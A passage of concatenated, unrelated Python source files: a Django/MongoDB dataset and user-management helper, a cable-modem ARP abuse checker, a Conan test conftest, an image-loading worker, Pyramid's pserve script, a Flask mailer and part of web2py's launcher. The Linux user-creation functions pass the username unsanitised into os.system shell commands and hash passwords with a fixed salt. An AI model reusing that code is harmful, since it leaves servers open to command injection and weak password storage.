mongouri = "mongodb://" + settings.MONGODB_USER + ":" + quote(
settings.MONGODB_PASSWORD) + "@" + settings.MONGODB_URI + "/admin"
connection = MongoClient(mongouri)
connection.admin.command('grantRolesToUser', target_user,
roles=[{'role': 'dbOwner', 'db': target_user + '_' + target_project_name}])
dataset = Dataset()
dataset.user = targetuser
dataset.database = target_user + '_' + target_project_name
dataset.save()
connection.close()
def mongodb_user_creation(username, password):
mongouri = "mongodb://" + settings.MONGODB_USER + ":" + quote(
settings.MONGODB_PASSWORD) + "@" + settings.MONGODB_URI + "/admin"
connection = MongoClient(mongouri)
connection.admin.command('createUser', username, pwd=password, roles=[])
connection.close()
def mongodb_user_password_change(username, password):
mongouri = "mongodb://" + settings.MONGODB_USER + ":" + quote(
settings.MONGODB_PASSWORD) + "@" + settings.MONGODB_URI + "/admin"
connection = MongoClient(mongouri)
connection.admin.command('updateUser', username, pwd=password)
connection.close()
def linux_user_creation(username, password):
encpass = crypt.crypt(password, "2424")
os.system("useradd -p " + encpass + " %s" % username)
os.system("mkdir /home/%s" % username)
os.system("chown %s:%s /home/%s" % (username, username, username))
def linux_user_pass_change(username, password):
encpass = crypt.crypt(password, "2424")
os.system("usermod -p " + encpass + " %s" % username)
@login_required
def database_preview(request, db):
datasets = Dataset.objects.filter(user=request.user)
databases = []
for dataset in datasets:
databases.append(dataset.database)
if db not in databases:
return HttpResponseNotFound('Nothing is here.')
mongouri = "mongodb://" + settings.MONGODB_USER + ":" + quote(
settings.MONGODB_PASSWORD) + "@" + settings.MONGODB_URI + "/admin"
connection = MongoClient(mongouri)
database = connection[db]
preview_data = {}
collections = database.collection_names()
for i, collection_name in enumerate(collections):
if collection_name != u'system.indexes':
col = database[collection_name]
collection = col.find(filter={}, projection={'_id': False}, limit=10, skip=0)
items = []
for item in collection:
items.append(item)
preview_data[collection_name] = json.dumps(items, ensure_ascii=False)
return render(request, template_name="databasepreview.html",
context={'username': request.user.username, 'databases': databases, 'preview_data': preview_data})
|
ubr10k_arp_check.py
|
#!/usr/bin/env python
#+-----------------------------------------------------------------------+
#| File Name: ubr10k_arp_check.py |
#+-----------------------------------------------------------------------+
#| Description: This script checks UBR10K arp tables for abusive devices |
#+-----------------------------------------------------------------------+
#| Usage: pass UBR10K IP addresses to the script for processing |
#+-----------------------------------------------------------------------+
#| Authors: Brian Spaulding |
#+-----------------------------------------------------------------------+
#| Date: 2016-04-15 |
#+-----------------------------------------------------------------------+
#| Version: 1.1.2 |
#+-----------------------------------------------------------------------+
####################################################
# Import necessary modules #
####################################################
import paramiko
import subprocess
import MySQLdb
import sys
import os
import socket
from threading import Thread
from collections import Counter
####################################################
# Enable or disable debugging #
####################################################
DEBUG = False
####################################################
# Pull active alarms from MySQL DB #
####################################################
db = MySQLdb.connect("localhost","REDACTED","REDACTED","zenoss_zep")
cursor = db.cursor()
cursor.execute("SELECT event_key FROM v_event_summary WHERE event_class = '/Cable Plant/IP Abuse' AND status_id in ('0','1')")
rows = cursor.fetchall()
db.close()
alarms = []
for row in rows:
alarms.append(row[0])
if DEBUG:
for alarm in alarms:
print "Mac address %s has an active alarm" % alarm
####################################################
# Confirm that each device is a UBR10K #
####################################################
ubr_ips = []
devnull = open(os.devnull, 'w')
for ip in sys.argv:
try:
check_model = str(subprocess.check_output(['snmpget', '-v2c', '-ccaution', ip, 'sysDescr.0'], stderr=devnull))
if "UBR10K" in check_model:
ubr_ips.append(ip)
else:
raise Exception()
except:
if ip not in sys.argv[0]:
print "%s is not a valid UBR10K IP address or hostname" % ip
pass
if DEBUG:
for ip in ubr_ips:
name = str(subprocess.check_output(['snmpget', '-v2c', '-ccaution', ip, 'sysName.0'])).rsplit(None, 1)[-1]
print "Device %s(%s) is ready for processing" % (name, ip)
####################################################
# Build function to gather arp tables #
####################################################
def ipabusealert(ip):
macs = []
name = str(subprocess.check_output(['snmpget', '-v2c', '-ccaution', ip, 'sysName.0'])).rsplit(None, 1)[-1]
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect( ip, username='REDACTED', password='REDACTED', look_for_keys=False, timeout=2)
except:
message = "Unable to SSH into %s to gather arp table" % name
subprocess.call(['zensendevent', '-d', name, '-y', 'ssh_error', '-p', 'SSH Error', '-s', 'Info', '-c', '/Cable Plant/', '-k', 'ssh_error', message])
sys.exit(0)
stdin, stdout, stderr = ssh.exec_command("show arp")
for line in stdout:
if "Bundle" in line and not " 10." in line and not ".1 " in line:
try:
macs.append(line.split()[3].strip())
except IndexError:
pass
ssh.close()
counter_mac = Counter(macs)
for mac in counter_mac:
if counter_mac[mac] >= 10:
message = "Customer mac address %s has %s entries in the arp table" % (mac, counter_mac[mac])
subprocess.call(['zensendevent', '-d', name, '-y', mac, '-p', mac, '-s', 'Warning', '-c', '/Cable Plant/IP Abuse', '-k', mac, message])
elif mac in alarms:
message = "Customer mac address %s has %s entries in the arp table" % (mac, counter_mac[mac])
subprocess.call(['zensendevent', '-d', name, '-y', mac, '-p', mac, '-s', 'Clear', '-c', '/Cable Plant/IP Abuse', '-k', mac, message])
alarms.remove(mac)
for mac in alarms:
if mac not in counter_mac:
message = "Customer mac address %s has 0 entries in the arp table" % mac
subprocess.call(['zensendevent', '-d', name, '-y', mac, '-p', mac, '-s', 'Clear', '-c', '/Cable Plant/IP Abuse', '-k', mac, message])
####################################################
# Call threaded function for each device #
####################################################
threads = []
for ip in ubr_ips:
t = Thread(target=ipabusealert, args=(ip,))
threads.append(t)
t.start()
for t in threads:
t.join()
|
conftest.py
|
import configparser
import ctypes
import os
import platform
import shutil
import sys
import tempfile
import time
from distutils.util import strtobool
from pathlib import Path
from shutil import copy
from subprocess import CalledProcessError, check_output
from threading import Thread
from unittest import mock
import conan_app_launcher.app.logger as logger
import psutil
import pytest
from conan_app_launcher import SETTINGS_FILE_NAME, base_path, user_save_path
from conan_app_launcher.core import ConanApi, ConanInfoCache, ConanWorker
from conan_app_launcher.settings import *
from conan_app_launcher.ui.common import remove_qt_logger
from conan_app_launcher.ui.main_window import MainWindow
from conans.model.ref import ConanFileReference
from PyQt5 import QtCore, QtWidgets
conan_server_thread = None
# setup conan test server
TEST_REF = "example/9.9.9@local/testing"
TEST_REF_OFFICIAL = "example/1.0.0@_/_"
SKIP_CREATE_CONAN_TEST_DATA = strtobool(os.getenv("SKIP_CREATE_CONAN_TEST_DATA", "False"))
QtWidgets.QApplication.setAttribute(QtCore.Qt.AA_EnableHighDpiScaling)
QtWidgets.QApplication.setAttribute(QtCore.Qt.AA_UseHighDpiPixmaps)
def is_ci_job():
if os.getenv("GITHUB_WORKSPACE"):
return True
return False
def get_window_pid(title):
import win32process
import win32gui
hwnd = win32gui.FindWindow(None, title)
_, pid = win32process.GetWindowThreadProcessId(hwnd)
return pid
class PathSetup():
""" Get the important paths form the source repo. """
def __init__(self):
self.test_path = Path(os.path.dirname(__file__))
self.core_path = self.test_path.parent
self.testdata_path = self.test_path / "testdata"
def check_if_process_running(process_name, kill=False):
for process in psutil.process_iter():
try:
if process_name.lower() in process.name().lower():
if kill:
process.kill()
return True
except (psutil.NoSuchProcess, psutil.AccessDenied, psutil.ZombieProcess):
pass
return False
def create_test_ref(ref, paths, create_params=[""], update=False):
native_ref = ConanFileReference.loads(ref).full_str()
pkgs = ConanApi().search_query_in_remotes(native_ref)
if not update:
for pkg in pkgs:
if pkg.full_str() == native_ref:
return
conanfile = str(paths.testdata_path / "conan" / "conanfile.py")
for param in create_params:
conan_create_and_upload(conanfile, ref, param)
def conan_create_and_upload(conanfile: str, ref: str, create_params=""):
os.system(f"conan create {conanfile} {ref} {create_params}")
os.system(f"conan upload {ref} -r local --force --all")
def run_conan_server():
os.system("conan_server")
def start_conan_server():
# Setup Server config
os.system("conan_server --migrate") # call server once to create a config file
config_path = Path.home() / ".conan_server" / "server.conf"
os.makedirs(str(config_path.parent), exist_ok=True)
# configre server config file
cp = configparser.ConfigParser()
cp.read(str(config_path))
# add write permissions
if "write_permissions" not in cp:
cp.add_section("write_permissions")
cp["write_permissions"]["*/*@*/*"] = "*"
# if "read_permissions" not in cp:
# cp.add_section("read_permissions")
# cp["read_permissions"]["*/*@*/*"] = "*"
# if "users" not in cp:
# cp.add_section("read_permissions")
# cp["read_permissions"]["*/*@*/*"] = "*"
with config_path.open('w', encoding="utf8") as fd:
cp.write(fd)
# Setup default profile
paths = PathSetup()
profiles_path = paths.testdata_path / "conan" / "profile"
conan = ConanApi()
os.makedirs(conan.client_cache.profiles_path, exist_ok=True)
shutil.copy(str(profiles_path / platform.system().lower()), conan.client_cache.default_profile_path)
# Add to firewall
if platform.system() == "Windows":
# check if firewall was set
try:
check_output("netsh advfirewall firewall show rule conan_server").decode("cp850")
except CalledProcessError:
# allow server port for private connections
args = f'advfirewall firewall add rule name="conan_server" program="{sys.executable}" dir= in action=allow protocol=TCP localport=9300'
ctypes.windll.shell32.ShellExecuteW(None, "runas", "netsh", args, None, 1)
print("Adding firewall rule for conan_server")
# Start Server
global conan_server_thread
if not conan_server_thread:
conan_server_thread = Thread(name="ConanServer", daemon=True, target=run_conan_server)
conan_server_thread.start()
time.sleep(3)
print("ADDING CONAN REMOTE")
os.system("conan remote add local http://127.0.0.1:9300/ false")
os.system("conan user demo -r local -p demo") # todo autogenerate and config
# add the same remote twice to be able to test multiremote views - TODO does not work
# os.system("conan remote add local2 http://127.0.0.1:9300/ false")
# os.system("conan user demo -r local2 -p demo") # todo autogenerate and config
# Create test data
if SKIP_CREATE_CONAN_TEST_DATA:
return
print("CREATING TESTDATA FOR LOCAL CONAN SERVER")
for profile in ["windows", "linux"]:
profile_path = profiles_path / profile
create_test_ref(TEST_REF, paths, [f"-pr {str(profile_path)}",
f"-o shared=False -pr {str(profile_path)}"], update=True)
create_test_ref(TEST_REF_OFFICIAL, paths, [f"-pr {str(profile_path)}"], update=True)
@pytest.fixture(scope="session", autouse=True)
def ConanServer():
started = False
if not check_if_process_running("conan_server"):
started = True
print("STARTING CONAN SERVER")
start_conan_server()
yield
if started:
print("\nKILLING CONAN SERVER\n ")
check_if_process_running("conan_server", kill=True)
@pytest.fixture
def base_fixture(request):
"""
Set up the global variables to be able to start the application.
Needs to be used, if the tested component uses the global Logger.
Clean up all instances after the test.
"""
paths = PathSetup()
os.environ["CONAN_REVISIONS_ENABLED"] = "1"
os.environ["DISABLE_ASYNC_LOADER"] = "True" # for code coverage to work
import conan_app_launcher.app as app
app.active_settings = settings_factory(SETTINGS_INI_TYPE, user_save_path / SETTINGS_FILE_NAME)
app.conan_api = ConanApi()
app.conan_worker = ConanWorker(app.conan_api, app.active_settings)
yield paths
# Teardown
# remove logger, so the logger doesn't log into nonexistant qt gui
remove_qt_logger(logger.Logger(), MainWindow.qt_logger_name)
# finish worker - otherwise errors and crashes will occur!
if app.conan_worker:
app.conan_worker.finish_working(3)
# delete cache file
if (base_path / ConanInfoCache.CACHE_FILE_NAME).exists():
try:
os.remove(base_path / ConanInfoCache.CACHE_FILE_NAME)
except PermissionError: # just Windows things...
time.sleep(5)
os.remove(base_path / ConanInfoCache.CACHE_FILE_NAME)
# reset singletons
app.conan_worker = None
app.conan_api = None
app.active_settings = None
@pytest.fixture
def light_theme_fixture(base_fixture):
import conan_app_launcher.app as app
app.active_settings.set(GUI_STYLE, GUI_STYLE_LIGHT)
def temp_ui_config(config_file_path: Path):
temp_config_file_path = copy(config_file_path, tempfile.gettempdir())
tmp_file = tempfile.mkstemp()
import conan_app_launcher.app as app
app.active_settings = settings_factory(SETTINGS_INI_TYPE, Path(tmp_file[1]))
app.active_settings.set(LAST_CONFIG_FILE, str(temp_config_file_path))
return Path(temp_config_file_path)
@pytest.fixture
def ui_config_fixture(base_fixture):
""" Use temporary default settings and config file based on testdata/app_config.json """
config_file_path = base_fixture.testdata_path / "app_config.json"
yield temp_ui_config(config_file_path)
@pytest.fixture
def ui_no_refs_config_fixture(base_fixture):
""" Use temporary default settings and config file based on testdata/app_config_empty_refs.json """
config_file_path = base_fixture.testdata_path / "app_config_empty_refs.json"
yield temp_ui_config(config_file_path)
@pytest.fixture
def mock_clipboard(mocker):
from PyQt5.QtWidgets import QApplication
mocker.patch.object(QApplication, 'clipboard')
clipboard = mock.MagicMock()
clipboard.supportsSelection.return_value = True
QApplication.clipboard.return_value = clipboard
return clipboard
|
worker.py
|
import collections
import functools
import threading
import os.path
import tempfile
import shutil
import exifread
from PIL import Image
import gi
gi.require_version('Gdk', '3.0')
gi.require_version('GdkPixbuf', '2.0')
gi.require_version('GLib', '2.0')
from gi.repository import Gdk
from gi.repository import GdkPixbuf
from gi.repository import GLib
PRIORITY_LOW = 200
PRIORITY_MEDIUM = 100
PRIORITY_HIGH = 50
PRIORITY_VERY_HIGH = 0
WorkerTask = collections.namedtuple(
'WorkerTask', ('priority', 'argument')
)
class StopTask(WorkerTask):
def __new__(cls):
return WorkerTask.__new__(cls, PRIORITY_LOW, None)
def process(self, window):
raise StopIteration()
class LoadPixmapTask(WorkerTask):
PRIORITY = PRIORITY_HIGH
def __new__(cls, pic):
return WorkerTask.__new__(cls, cls.PRIORITY, pic)
def notify_window(self, window, item):
window.emit('picture-loaded', item)
return False
def process(self, window):
item = self.argument
print("Worker handling item", item)
if item.pixbuf:
print("Image already loaded")
return
print("Loading image", item)
item.pixbuf = self.load_pixmap(item.file_path)
print("Loaded image", item)
GLib.idle_add(self.notify_window, window, item)
@staticmethod
def load_pixmap(path):
screen_width = Gdk.Screen.width()
screen_height = Gdk.Screen.height()
with open(path, 'rb') as f:
tags = exifread.process_file(f)
orientation = tags.get('Image Orientation')
orientation = orientation.printable if orientation else None
if orientation == 'Horizontal (normal)':
width, height = screen_width, screen_height
rotation = 0
elif orientation == 'Rotated 90 CW':
width, height = screen_height, screen_width
rotation = 270
elif orientation == 'Rotated 90 CCW':
width, height = screen_height, screen_width
rotation = 90
else:
print('Unrecognizable orientation {}'.format(orientation))
width, height = screen_width, screen_height
rotation = 0
pixbuf = GdkPixbuf.Pixbuf.new_from_file_at_size(path, width, height)
if rotation:
pixbuf = pixbuf.rotate_simple(rotation)
return pixbuf
class LoadCurrentPixmapTask(LoadPixmapTask):
PRIORITY = PRIORITY_VERY_HIGH
class CopyPicsTask(WorkerTask):
def __new__(cls, pics):
return WorkerTask.__new__(cls, PRIORITY_MEDIUM, pics)
def process(self, window):
pics = self.argument
target_directory = tempfile.mkdtemp('', 'pictures_copied_')
print('Created target directory', target_directory)
for pic in pics:
in_path = pic.file_path
out_path = shutil.copy2(in_path, target_directory)
print('Copied', in_path, 'to', out_path)
print('Copy finished')
class ScalePicsTask(WorkerTask):
def __new__(cls, pics):
return WorkerTask.__new__(cls, PRIORITY_MEDIUM, pics)
def process(self, window):
pics = self.argument
target_directory = tempfile.mkdtemp('', 'pictures_scaled_')
print('Created target directory', target_directory)
for pic in pics:
in_path = pic.file_path
out_path = os.path.join(
target_directory, 'FULLHD_{}'.format(pic.filename)
)
image = Image.open(in_path)
image.thumbnail((1920, 1080), Image.ANTIALIAS)
image.save(out_path, 'JPEG')
print('Scaled', in_path, 'to', out_path)
print('Scale finished')
def work(task_queue, window):
print("Worker thread started")
while True:
task = task_queue.get()
assert isinstance(task, WorkerTask)
try:
task.process(window)
except StopIteration:
break
finally:
task_queue.task_done()
def create_worker(task_queue, window):
callback = functools.partial(work, task_queue, window)
return threading.Thread(target=callback)
|
pserve.py
|
# (c) 2005 Ian Bicking and contributors; written for Paste
# (http://pythonpaste.org) Licensed under the MIT license:
# http://www.opensource.org/licenses/mit-license.php
#
# For discussion of daemonizing:
# http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/278731
#
# Code taken also from QP: http://www.mems-exchange.org/software/qp/ From
# lib/site.py
import argparse
import os
import re
import sys
import textwrap
import threading
import time
import webbrowser
import hupper
from paste.deploy import (
loadapp,
loadserver,
)
from paste.deploy.loadwsgi import (
SERVER,
loadcontext,
)
from pyramid.compat import PY2
from pyramid.compat import configparser
from pyramid.scripts.common import parse_vars
from pyramid.scripts.common import setup_logging
from pyramid.path import AssetResolver
from pyramid.settings import aslist
def main(argv=sys.argv, quiet=False):
command = PServeCommand(argv, quiet=quiet)
return command.run()
class PServeCommand(object):
description = """\
This command serves a web application that uses a PasteDeploy
configuration file for the server and application.
You can also include variable assignments like 'http_port=8080'
and then use %(http_port)s in your config files.
"""
default_verbosity = 1
parser = argparse.ArgumentParser(
description=textwrap.dedent(description),
formatter_class=argparse.RawDescriptionHelpFormatter,
)
parser.add_argument(
'-n', '--app-name',
dest='app_name',
metavar='NAME',
help="Load the named application (default main)")
parser.add_argument(
'-s', '--server',
dest='server',
metavar='SERVER_TYPE',
help="Use the named server.")
parser.add_argument(
'--server-name',
dest='server_name',
metavar='SECTION_NAME',
help=("Use the named server as defined in the configuration file "
"(default: main)"))
parser.add_argument(
'--reload',
dest='reload',
action='store_true',
help="Use auto-restart file monitor")
parser.add_argument(
'--reload-interval',
dest='reload_interval',
default=1,
help=("Seconds between checking files (low number can cause "
"significant CPU usage)"))
parser.add_argument(
'-b', '--browser',
dest='browser',
action='store_true',
help="Open a web browser to server url")
parser.add_argument(
'-v', '--verbose',
default=default_verbosity,
dest='verbose',
action='count',
help="Set verbose level (default " + str(default_verbosity) + ")")
parser.add_argument(
'-q', '--quiet',
action='store_const',
const=0,
dest='verbose',
help="Suppress verbose output")
parser.add_argument(
'config_uri',
nargs='?',
default=None,
help='The URI to the configuration file.',
)
parser.add_argument(
'config_vars',
nargs='*',
default=(),
help="Variables required by the config file. For example, "
"`http_port=%%(http_port)s` would expect `http_port=8080` to be "
"passed here.",
)
ConfigParser = configparser.ConfigParser # testing
loadapp = staticmethod(loadapp) # testing
loadserver = staticmethod(loadserver) # testing
_scheme_re = re.compile(r'^[a-z][a-z]+:', re.I)
def __init__(self, argv, quiet=False):
self.args = self.parser.parse_args(argv[1:])
if quiet:
self.args.verbose = 0
if self.args.reload:
self.worker_kwargs = {'argv': argv, "quiet": quiet}
self.watch_files = []
def out(self, msg): # pragma: no cover
if self.args.verbose > 0:
print(msg)
def get_config_vars(self):
restvars = self.args.config_vars
return parse_vars(restvars)
def pserve_file_config(self, filename, global_conf=None):
here = os.path.abspath(os.path.dirname(filename))
defaults = {}
if global_conf:
defaults.update(global_conf)
defaults['here'] = here
config = self.ConfigParser(defaults=defaults)
config.optionxform = str
config.read(filename)
try:
items = dict(config.items('pserve'))
except configparser.NoSectionError:
return
watch_files = aslist(items.get('watch_files', ''), flatten=False)
# track file paths relative to the ini file
resolver = AssetResolver(package=None)
for file in watch_files:
if ':' in file:
file = resolver.resolve(file).abspath()
elif not os.path.isabs(file):
file = os.path.join(here, file)
self.watch_files.append(os.path.abspath(file))
def run(self): # pragma: no cover
if not self.args.config_uri:
self.out('You must give a config file')
return 2
app_spec = self.args.config_uri
vars = self.get_config_vars()
app_name = self.args.app_name
base = os.getcwd()
if not self._scheme_re.search(app_spec):
config_path = os.path.join(base, app_spec)
app_spec = 'config:' + app_spec
else:
config_path = None
server_name = self.args.server_name
if self.args.server:
server_spec = 'egg:pyramid'
assert server_name is None
server_name = self.args.server
else:
server_spec = app_spec
# do not open the browser on each reload so check hupper first
if self.args.browser and not hupper.is_active():
def open_browser():
context = loadcontext(
SERVER, app_spec, name=server_name, relative_to=base,
global_conf=vars)
url = 'http://127.0.0.1:{port}/'.format(**context.config())
time.sleep(1)
webbrowser.open(url)
t = threading.Thread(target=open_browser)
t.setDaemon(True)
t.start()
if self.args.reload and not hupper.is_active():
if self.args.verbose > 1:
self.out('Running reloading file monitor')
hupper.start_reloader(
'pyramid.scripts.pserve.main',
reload_interval=int(self.args.reload_interval),
verbose=self.args.verbose,
worker_kwargs=self.worker_kwargs
)
return 0
if config_path:
setup_logging(config_path, global_conf=vars)
self.pserve_file_config(config_path, global_conf=vars)
self.watch_files.append(config_path)
if hupper.is_active():
reloader = hupper.get_reloader()
reloader.watch_files(self.watch_files)
server = self.loadserver(
server_spec, name=server_name, relative_to=base, global_conf=vars)
app = self.loadapp(
app_spec, name=app_name, relative_to=base, global_conf=vars)
if self.args.verbose > 0:
if hasattr(os, 'getpid'):
msg = 'Starting server in PID %i.' % os.getpid()
else:
msg = 'Starting server.'
self.out(msg)
try:
server(app)
except (SystemExit, KeyboardInterrupt) as e:
if self.args.verbose > 1:
raise
if str(e):
msg = ' ' + str(e)
else:
msg = ''
self.out('Exiting%s (-v to see traceback)' % msg)
# For paste.deploy server instantiation (egg:pyramid#wsgiref)
def wsgiref_server_runner(wsgi_app, global_conf, **kw): # pragma: no cover
from wsgiref.simple_server import make_server
host = kw.get('host', '0.0.0.0')
port = int(kw.get('port', 8080))
server = make_server(host, port, wsgi_app)
print('Starting HTTP server on http://%s:%s' % (host, port))
server.serve_forever()
# For paste.deploy server instantiation (egg:pyramid#cherrypy)
def cherrypy_server_runner(
app, global_conf=None, host='127.0.0.1', port=None,
ssl_pem=None, protocol_version=None, numthreads=None,
server_name=None, max=None, request_queue_size=None,
timeout=None
): # pragma: no cover
"""
Entry point for CherryPy's WSGI server
Serves the specified WSGI app via CherryPyWSGIServer.
``app``
The WSGI 'application callable'; multiple WSGI applications
may be passed as (script_name, callable) pairs.
``host``
This is the ipaddress to bind to (or a hostname if your
nameserver is properly configured). This defaults to
127.0.0.1, which is not a public interface.
``port``
The port to run on, defaults to 8080 for HTTP, or 4443 for
HTTPS. This can be a string or an integer value.
``ssl_pem``
This an optional SSL certificate file (via OpenSSL) You can
generate a self-signed test PEM certificate file as follows:
$ openssl genrsa 1024 > host.key
$ chmod 400 host.key
$ openssl req -new -x509 -nodes -sha1 -days 365 \\
-key host.key > host.cert
$ cat host.cert host.key > host.pem
$ chmod 400 host.pem
``protocol_version``
The protocol used by the server, by default ``HTTP/1.1``.
``numthreads``
The number of worker threads to create.
``server_name``
The string to set for WSGI's SERVER_NAME environ entry.
``max``
The maximum number of queued requests. (defaults to -1 = no
limit).
``request_queue_size``
The 'backlog' argument to socket.listen(); specifies the
maximum number of queued connections.
``timeout``
The timeout in seconds for accepted connections.
"""
is_ssl = False
if ssl_pem:
port = port or 4443
is_ssl = True
if not port:
if ':' in host:
host, port = host.split(':', 1)
else:
port = 8080
bind_addr = (host, int(port))
kwargs = {}
for var_name in ('numthreads', 'max', 'request_queue_size', 'timeout'):
var = locals()[var_name]
if var is not None:
kwargs[var_name] = int(var)
from cherrypy import wsgiserver
server = wsgiserver.CherryPyWSGIServer(bind_addr, app,
server_name=server_name, **kwargs)
if ssl_pem is not None:
if PY2:
server.ssl_certificate = server.ssl_private_key = ssl_pem
else:
# creates wsgiserver.ssl_builtin as side-effect
wsgiserver.get_ssl_adapter_class()
server.ssl_adapter = wsgiserver.ssl_builtin.BuiltinSSLAdapter(
ssl_pem, ssl_pem)
if protocol_version:
server.protocol = protocol_version
try:
protocol = is_ssl and 'https' or 'http'
if host == '0.0.0.0':
print('serving on 0.0.0.0:%s view at %s://127.0.0.1:%s' %
(port, protocol, port))
else:
print('serving on %s://%s:%s' % (protocol, host, port))
server.start()
except (KeyboardInterrupt, SystemExit):
server.stop()
return server
if __name__ == '__main__': # pragma: no cover
sys.exit(main() or 0)
|
email.py
|
# -*- coding:utf-8 -*-
# pipenv install flask-mail
from flask_mail import Mail
from flask_mail import Message
from flask import current_app, render_template
from threading import Thread
mail = Mail()
def send_async_email(app, msg):
with app.app_context():
try:
mail.send(msg)
except Exception as e:
raise e
def send_main(to, subject, template, **kwargs):
# msg=Message('邮件标题',sender='配置文件中的MAIL_USERNAME',body='正文',recipients=['@qq.com'])
msg = Message(subject, sender=current_app.config['MAIL_USERNAME'], recipients=[to])
msg.html = render_template(template, **kwargs)
app = current_app.__get_current_object()
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
# 前端使用 send_mail(form.email.data,'重置密码', 'email/reset_password.html',user=user,token=user.generate_token)
|
widget.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
| This file is part of the web2py Web Framework
| Copyrighted by Massimo Di Pierro <mdipierro@cs.depaul.edu>
| License: LGPLv3 (http://www.gnu.org/licenses/lgpl.html)
The widget is called from web2py
----------------------------------
"""
from __future__ import print_function
import datetime
import sys
from gluon._compat import StringIO, thread, xrange
import time
import threading
import os
import copy
import socket
import signal
import math
import logging
import getpass
from gluon import main, newcron
from gluon.fileutils import read_file, write_file, create_welcome_w2p
from gluon.settings import global_settings
from gluon.shell import run, test
from gluon.utils import is_valid_ip_address, is_loopback_ip_address, getipaddrinfo
ProgramName = 'web2py Web Framework'
ProgramAuthor = 'Created by Massimo Di Pierro, Copyright 2007-' + str(
datetime.datetime.now().year)
ProgramVersion = read_file('VERSION').strip()
ProgramInfo = '''%s
%s
%s''' % (ProgramName, ProgramAuthor, ProgramVersion)
if not sys.version[:3] in ['2.7']:
msg = 'Warning: web2py requires Python 2.7 but you are running:\n%s'
msg = msg % sys.version
sys.stderr.write(msg)
logger = logging.getLogger("web2py")
def run_system_tests(options):
"""
Runs unittests for gluon.tests
"""
import subprocess
major_version = sys.version_info[0]
minor_version = sys.version_info[1]
call_args = [sys.executable, '-m', 'unittest', '-v', 'gluon.tests']
if major_version == 2:
if minor_version in (7,):
if options.with_coverage:
try:
import coverage
coverage_config = os.environ.get(
"COVERAGE_PROCESS_START",
os.path.join('gluon', 'tests', 'coverage.ini'))
call_args = ['coverage', 'run', '--rcfile=%s' %
coverage_config,
'-m', 'unittest', '-v', 'gluon.tests']
except:
sys.stderr.write('Coverage was not installed, skipping\n')
sys.stderr.write("Python 2.7\n")
ret = subprocess.call(call_args)
else:
sys.stderr.write("unknown python 2.x version\n")
ret = 256
else:
sys.stderr.write("Experimental Python 3.x.\n")
ret = subprocess.call(call_args)
sys.exit(ret and 1)
class IO(object):
""" """
def __init__(self):
""" """
self.buffer = StringIO()
def write(self, data):
""" """
sys.__stdout__.write(data)
if hasattr(self, 'callback'):
self.callback(data)
else:
self.buffer.write(data)
def get_url(host, path='/', proto='http', port=80):
if ':' in host:
host = '[%s]' % host
else:
host = host.replace('0.0.0.0', '127.0.0.1')
if path.startswith('/'):
path = path[1:]
if proto.endswith(':'):
proto = proto[:-1]
if not port or port == 80:
port = ''
else:
port = ':%s' % port
return '%s://%s%s/%s' % (proto, host, port, path)
def start_browser(url, startup=False):
if startup:
print('please visit:')
print('\t', url)
print('starting browser...')
try:
import webbrowser
webbrowser.open(url)
except:
print('warning: unable to detect your browser')
class web2pyDialog(object):
""" Main window dialog """
def __init__(self, root, options):
""" web2pyDialog constructor """
import Tkinter
import tkMessageBox
bg_color = 'white'
root.withdraw()
self.root = Tkinter.Toplevel(root, bg=bg_color)
self.root.resizable(0, 0)
self.root.title(ProgramName)
self.options = options
self.scheduler_processes = {}
self.menu = Tkinter.Menu(self.root)
servermenu = Tkinter.Menu(self.menu, tearoff=0)
httplog = os.path.join(self.options.folder, self.options.log_filename)
iconphoto = os.path.join('extras', 'icons', 'web2py.gif')
if os.path.exists(iconphoto):
img = Tkinter.PhotoImage(file=iconphoto)
self.root.tk.call('wm', 'iconphoto', self.root._w, img)
# Building the Menu
item = lambda: start_browser(httplog)
servermenu.add_command(label='View httpserver.log',
command=item)
servermenu.add_command(label='Quit (pid:%i)' % os.getpid(),
command=self.quit)
self.menu.add_cascade(label='Server', menu=servermenu)
self.pagesmenu = Tkinter.Menu(self.menu, tearoff=0)
self.menu.add_cascade(label='Pages', menu=self.pagesmenu)
#scheduler menu
self.schedmenu = Tkinter.Menu(self.menu, tearoff=0)
self.menu.add_cascade(label='Scheduler', menu=self.schedmenu)
#start and register schedulers from options
self.update_schedulers(start=True)
helpmenu = Tkinter.Menu(self.menu, tearoff=0)
# Home Page
item = lambda: start_browser('http://www.web2py.com/')
helpmenu.add_command(label='Home Page',
command=item)
# About
item = lambda: tkMessageBox.showinfo('About web2py', ProgramInfo)
helpmenu.add_command(label='About',
command=item)
self.menu.add_cascade(label='Info', menu=helpmenu)
self.root.config(menu=self.menu)
if options.taskbar:
self.root.protocol('WM_DELETE_WINDOW',
lambda: self.quit(True))
else:
self.root.protocol('WM_DELETE_WINDOW', self.quit)
sticky = Tkinter.NW
# Prepare the logo area
self.logoarea = Tkinter.Canvas(self.root,
background=bg_color,
width=300,
height=300)
self.logoarea.grid(row=0, column=0, columnspan=4, sticky=sticky)
self.logoarea.after(1000, self.update_canvas)
logo = os.path.join('extras', 'icons', 'splashlogo.gif')
if os.path.exists(logo):
img = Tkinter.PhotoImage(file=logo)
pnl = Tkinter.Label(self.logoarea, image=img, background=bg_color, bd=0)
pnl.pack(side='top', fill='both', expand='yes')
# Prevent garbage collection of img
pnl.image = img
# Prepare the banner area
self.bannerarea = Tkinter.Canvas(self.root,
bg=bg_color,
width=300,
height=300)
self.bannerarea.grid(row=1, column=1, columnspan=2, sticky=sticky)
Tkinter.Label(self.bannerarea, anchor=Tkinter.N,
text=str(ProgramVersion + "\n" + ProgramAuthor),
font=('Helvetica', 11), justify=Tkinter.CENTER,
foreground='#195866', background=bg_color,
height=3).pack(side='top',
fill='both',
expand='yes')
self.bannerarea.after(1000, self.update_canvas)
# IP
Tkinter.Label(self.root,
text='Server IP:', bg=bg_color,
justify=Tkinter.RIGHT).grid(row=4,
column=1,
sticky=sticky)
self.ips = {}
self.selected_ip = Tkinter.StringVar()
row = 4
ips = [('127.0.0.1', 'Local (IPv4)')] + \
([('::1', 'Local (IPv6)')] if socket.has_ipv6 else []) + \
[(ip, 'Public') for ip in options.ips] + \
[('0.0.0.0', 'Public')]
for ip, legend in ips:
self.ips[ip] = Tkinter.Radiobutton(
self.root, bg=bg_color, highlightthickness=0,
selectcolor='light grey', width=30,
anchor=Tkinter.W, text='%s (%s)' % (legend, ip),
